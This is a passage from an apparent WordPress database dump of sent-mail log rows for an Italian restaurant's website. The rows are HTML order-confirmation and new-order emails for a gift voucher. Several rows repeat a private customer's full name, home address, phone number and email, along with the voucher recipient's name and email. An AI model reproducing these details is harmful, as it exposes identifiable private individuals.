<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!','Incorrect authentication data\r\n','private','closed','closed','','il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-3','','','2020-10-26 09:52:51','2020-10-26 08:52:51','',0,'https://www.ristorantesolymar.it/postman_sent_mail/il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-3/',0,'postman_sent_mail','',0),(1162,1,'2020-10-26 09:52:51','2020-10-26 08:52:51','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!','Sent ( ** Fallback ** )','private','closed','closed','','il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-4','','','2020-10-26 09:52:51','2020-10-26 08:52:51','',0,'https://www.ristorantesolymar.it/postman_sent_mail/il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-4/',0,'postman_sent_mail','',0),(1163,1,'2020-10-26 09:53:00','2020-10-26 08:53:00','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-2','','','2020-10-26 09:53:00','2020-10-26 08:53:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-2/',0,'postman_sent_mail','',0),(1164,1,'2020-10-26 09:53:00','2020-10-26 08:53:00','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 